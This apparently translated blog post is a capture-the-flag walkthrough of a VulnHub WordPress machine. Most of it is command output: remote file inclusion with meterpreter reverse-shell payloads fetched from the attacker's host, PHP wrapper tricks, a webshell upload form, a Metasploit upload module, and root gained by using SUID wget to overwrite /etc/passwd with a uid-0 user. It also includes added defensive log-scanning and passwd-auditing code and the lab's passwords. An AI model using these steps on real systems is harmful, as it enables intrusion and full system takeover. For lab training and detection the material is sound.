www-data@ubuntu:/var/www/html$ cat info.php
cat info.php
<?php
echo $_SERVER['HTTP_HOST'];
?>
www-data@ubuntu:/var/www/html$
  • The password is the admin password hash obtained from the SQL injection above.
➜  VulnHub unzip secret.zip                                          
Archive:  secret.zip
[secret.zip] link.txt password: 
  inflating: link.txt                
➜  VulnHub cat link.txt    
https://www.exploit-db.com/exploits/38861
https://www.exploit-db.com/exploits/40290
https://www.exploit-db.com/exploits/36374
https://www.exploit-db.com/exploits/37824
https://www.exploit-db.com/exploits/41006%
➜  VulnHub
  • It turned out to be a bunch of links, apparently the same ones wpscan found, so it seems to serve no purpose; taken together with the notes.txt hint, it just tells you that there are several ways to get a shell.

CVE-2015-8351 Remote File Inclusion

  • First, remote file inclusion.
  • Start the MSF listener.
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 2333
lport => 2333
msf5 exploit(multi/handler) > set lhost 192.168.116.1
lhost => 192.168.116.1
msf5 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.116.1    yes       The listen address (an interface may be specified)
   LPORT  2333             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run 

[*] Started reverse TCP handler on 192.168.116.1:2333 
[*] Sending stage (38247 bytes) to 192.168.116.138
[*] Meterpreter session 1 opened (192.168.116.1:2333 -> 192.168.116.138:42968) at 2019-09-26 11:45:39 +0800

meterpreter >
  • Set up HTTP: rename the shell to wp-load.php and start the HTTP server.
➜  VulnHub msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.1 LPORT=2333 -o shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes
Saved as: shell.php
➜  VulnHub python3.7 -m http.server                                                           
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.116.138 - - [26/Sep/2019 11:45:11] code 404, message File not found
192.168.116.138 - - [26/Sep/2019 11:45:11] "GET /shell.phpwp-load.php HTTP/1.0" 404 -
^C
Keyboard interrupt received, exiting.
➜  VulnHub 
➜  VulnHub cp shell.php wp-load.php
➜  VulnHub python3.7 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.116.138 - - [26/Sep/2019 11:45:39] "GET /wp-load.php HTTP/1.0" 200 -
  • Visit http://192.168.116.138/wordpress/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.116.1:8000/ and the session comes back.

Local File Inclusion

  • Sensitive information: /etc/apache2/.htpasswd
  • The description says local file inclusion, but when I tested it remote file inclusion worked too, which makes getting command execution even simpler.
  • Visiting http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://192.168.116.1:8000/shell.php gives a remote session.
  • One approach for local inclusion is to upload a file containing malicious PHP code, find the upload path, and then include it to get a session.
  • Another is to include a log file after finding a way to get a one-line webshell written into it; usually that means the Apache access log or the SSH failed-login log, depending on which services the server exposes. This box is a bit of a trap, though: only Apache is running, and the logs cannot be read.
  • But there are still ways: the various stream wrappers that PHP supports.
http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=data://text/plain;base64,PD9waHAgIHBocGluZm8oKTs/Pg==

➜  ~ curl "http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://input" -d "<?php phpinfo();?>"
  • phpinfo shows quite a few supported wrappers:
https, ftps, compress.zlib, php, file, glob, data, http, ftp, compress.bzip2, phar, zip
  • I will not demonstrate the one-line webshell.
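Every inclusion variant shown in this section leaves a distinctive query parameter in the Apache access log: a remote URL, a php://, data:// or similar wrapper, or a ../ traversal. (The remote-URL and wrapper variants also only work when PHP's allow_url_include is on, so that setting is the first thing to check on the defender's side.) As an added example, not part of this write-up, the Python below parses Apache combined-format log lines, URL-decodes each query value (including double-encoded ones) and classifies it. The SAMPLE_LOG is constructed: the first four requests mirror the ones made above, the fifth is a generic traversal attempt, and the last two are benign.

```python
"""Flag file-inclusion attempts in an Apache access log (added example)."""
import re
from urllib.parse import unquote_plus

# Apache "combined" log line: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Checked in order; the first category that matches a parameter value wins.
CHECKS = (
    ("php_wrapper", re.compile(r"^(php|data|phar|zip|glob|expect|compress\.\w+|file)://", re.I)),
    ("remote_url", re.compile(r"^(https?|ftps?)://", re.I)),
    ("path_traversal", re.compile(r"(^|[/\\])\.\.[/\\]")),
)


def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded values are still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value):
    for name, pattern in CHECKS:
        if pattern.search(value):
            return name
    return None


def scan_log(text):
    """Return one finding per suspicious query parameter, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        for pair in query.split("&"):
            key, _, value = pair.partition("=")
            category = classify(decode_fully(value))
            if category:
                findings.append({"ip": m.group("ip"), "path": path,
                                 "param": unquote_plus(key), "category": category})
    return findings


# Constructed sample: the wrapper and remote-URL requests from this write-up,
# a generic traversal attempt, and two benign requests.
SAMPLE_LOG = """\
192.168.116.1 - - [26/Sep/2019:11:45:39 +0800] "GET /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://192.168.116.1:8000/shell.php HTTP/1.1" 200 1114
192.168.116.1 - - [26/Sep/2019:11:50:02 +0800] "GET /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=data://text/plain;base64,PD9waHAgIHBocGluZm8oKTs/Pg== HTTP/1.1" 200 78213
192.168.116.1 - - [26/Sep/2019:11:51:10 +0800] "POST /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://input HTTP/1.1" 200 78213
192.168.116.1 - - [26/Sep/2019:11:52:30 +0800] "GET /wordpress/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.116.1:8000/ HTTP/1.1" 200 0
192.168.116.1 - - [26/Sep/2019:11:53:00 +0800] "GET /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2049
10.0.0.5 - - [26/Sep/2019:11:54:11 +0800] "GET /wordpress/index.php/feed/ HTTP/1.1" 200 4412
10.0.0.5 - - [26/Sep/2019:11:54:12 +0800] "GET /wordpress/wp-content/uploads/2019/09/photo.jpg HTTP/1.1" 200 88213
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["category"], f["ip"], f["path"], f["param"])
```

Note that the php://input case is only visible because the wrapper name is in the query string; the PHP code itself travels in the POST body, which the access log never records, so body-based detection needs a WAF or mod_security rather than log review.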

File Upload

<form method="POST" action="http://192.168.116.138/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2019&Month=09" enctype="multipart/form-data" >
    <input type="file" name="qqfile"><br>
    <input type="submit" name="Submit" value="Pwn!">
</form>
  • Open it in a browser, pick the webshell to upload, then open the upload directory and request the webshell; that is all it takes.

CSRF Privilege Escalation

Admin Password: Ignite@123
  • In the Aarti user's profile I found the root password Ignite@123 and the second flag.
Second Flag: 5DD1CC591CE1569A528E3BCF18CEEB5B

RootPassword: SWduaXRlQDEyMw==
  • The passwords are all the same.

Authenticated Plugin File Upload

  • One of the exploits above needs a password; now that I have the password, do I still need an exploit?
msf5 exploit(unix/webapp/wp_slideshowgallery_upload) > show options 

Module options (exploit/unix/webapp/wp_slideshowgallery_upload):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.116.138  yes       The target address range or CIDR identifier
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /wordpress       yes       The base path to the wordpress application
   VHOST                         no        HTTP server virtual host
   WP_PASSWORD  Ignite@123       yes       Valid password for the provided username
   WP_USER      admin            yes       A valid username


Exploit target:

   Id  Name
   --  ----
   0   WP SlideShow Gallery 1.4.6


msf5 exploit(unix/webapp/wp_slideshowgallery_upload) > run 

[*] Started reverse TCP handler on 192.168.116.1:4444 
[*] Trying to login as admin
[*] Trying to upload payload
[*] Uploading payload
[*] Calling uploaded file gxwuywll.php
[*] Sending stage (38247 bytes) to 192.168.116.138
[*] Meterpreter session 2 opened (192.168.116.1:4444 -> 192.168.116.138:41014) at 2019-09-26 18:24:09 +0800
[+] Deleted gxwuywll.php

meterpreter >
  • Going along with the plot anyway; never mind.

Privilege escalation to root

  • Pick any of the sessions, drop into a shell, and look for SUID binaries.
meterpreter > shell
Process 2084 created.
Channel 0 created.
www-data@ubuntu:/var/www$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/arping
/usr/bin/wget
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/vmware-user-suid-wrapper
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping
/bin/cp
/bin/su
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
www-data@ubuntu:/var/www$
  • cp and wget are both SUID root, and either one can overwrite an arbitrary file, so the plan is to replace /etc/passwd. The replacement is the original file with one extra entry appended: a user with uid 0 and gid 0 whose password hash is stored inline in the passwd line, so no /etc/shadow entry is needed. Keeping every original line intact is what prevents breaking logins on the box. Because wget runs with an effective uid of 0, wget -O writes the file as root (the HSTS warning is harmless; it only means wget could not write its HSTS cache in www-data's home).
www-data@ubuntu:/etc$ wget -O passwd http://192.168.116.1:8000/passwd
wget -O passwd http://192.168.116.1:8000/passwd
ERROR: could not open HSTS store. HSTS will be disabled.
--2019-09-26 11:54:08--  http://192.168.116.1:8000/passwd
Connecting to 192.168.116.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2557 (2.5K) [application/octet-stream]
Saving to: 'passwd'

passwd              100%[===================>]   2.50K  --.-KB/s    in 0.001s  

2019-09-26 11:54:08 (2.86 MB/s) - 'passwd' saved [2557/2557]

www-data@ubuntu:/etc$ cat passwd
cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
raj:x:1000:1000:raj,,,:/home/raj:/bin/bash
mysql:x:122:128:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:124:65534::/run/sshd:/usr/sbin/nologin
kt:$1$kt$mR/jSFSDV/G0vNQ72T8cs.:0:0:root:/root:/bin/bash
www-data@ubuntu:/etc$ su kt
su kt
Password: 123

root@ubuntu:/etc# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/etc#
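The overwrite step, together with the check a defender would run on the resulting file, as an added Python example that is not part of the write-up. The only real value it reuses is the page's kt hash (an MD5-crypt of 123 with salt kt; openssl passwd -1 -salt kt 123 produces hashes of this form); the sample passwd text is a constructed excerpt of the listing above.

```python
# Constructed excerpt of the listing above (enough lines for the example).
ORIGINAL_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
raj:x:1000:1000:raj,,,:/home/raj:/bin/bash
"""

# The hash used in the write-up: MD5-crypt ($1$) of "123", salt "kt".
# Produce your own with:  openssl passwd -1 -salt kt 123
KT_HASH = "$1$kt$mR/jSFSDV/G0vNQ72T8cs."


def append_uid0_user(passwd_text: str, name: str, pw_hash: str,
                     shell: str = "/bin/bash") -> str:
    """Attacker side: return the original file with one extra uid 0 / gid 0 entry.
    The hash sits in field 2 of passwd itself, so /etc/shadow is never consulted.
    Every original line is kept so nothing else on the host breaks."""
    if not passwd_text.endswith("\n"):
        passwd_text += "\n"
    return passwd_text + f"{name}:{pw_hash}:0:0:root:/root:{shell}\n"


def audit_passwd(passwd_text: str) -> list:
    """Defender side: flag what this technique leaves behind in /etc/passwd:
      - a uid-0 account that is not 'root'
      - a real hash (or an empty field) where an 'x' should point at shadow
      - malformed lines
    Returns a list of (subject, reason) tuples; an empty list means clean."""
    findings = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            findings.append((user, "extra uid-0 account"))
        if pw == "":
            findings.append((user, "empty password field"))
        elif pw not in ("x", "*", "!"):
            findings.append((user, "password hash stored in /etc/passwd"))
    return findings


if __name__ == "__main__":
    # Write the crafted file, then on the box: wget -O /etc/passwd http://<attacker>:8000/passwd
    crafted = append_uid0_user(ORIGINAL_PASSWD, "kt", KT_HASH)
    with open("passwd", "w") as fh:
        fh.write(crafted)
    for subject, reason in audit_passwd(crafted):
        print(f"{subject}: {reason}")
```

Run the audit against a live /etc/passwd the same way (open("/etc/passwd").read()); the two findings it reports for kt are exactly what a host-integrity check or an osquery rule on uid 0 should alert on.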

Getting the flag

root@ubuntu:/etc# cd /root
cd /root
root@ubuntu:~# ls
ls
proof.txt
root@ubuntu:~# cat proof.txt
cat proof.txt
_________________________________________________________________________
 _____     _   _   U _____ u     U _____ u   _   _       ____     	|	
 |_ " _|   |'| |'|  \| ___"|/     \| ___"|/  | \ |"|     |  _"\   	|
   | |    /| |_| |\  |  _|"        |  _|"   <|  \| |>   /| | | |  	|	
  /| |\   U|  _  |u  | |___        | |___   U| |\  |u   U| |_| |\ 	|
 u |_|U    |_| |_|   |_____|       |_____|   |_| \_|     |____/ u 	|
 _// \\_   //   \\   <<   >>       <<   >>   ||   \\,-.   |||_    	|
(__) (__) (_") ("_) (__) (__)     (__) (__)  (_")  (_/   (__)_)   	|
									|
									|
!! Congrats you have finished this task !!				|
									|
Contact us here:							|
									|
Hacking Articles : https://twitter.com/rajchandel/			|
									|
									|
+-+-+-+-+-+ +-+-+-+-+-+-+-+						|
 |E|n|j|o|y| |H|A|C|K|I|N|G|						|
 +-+-+-+-+-+ +-+-+-+-+-+-+-+						|
________________________________________________________________________|

                                                

root@ubuntu:~#
posted @ 2020-01-19 09:22 by 三米前有蕉皮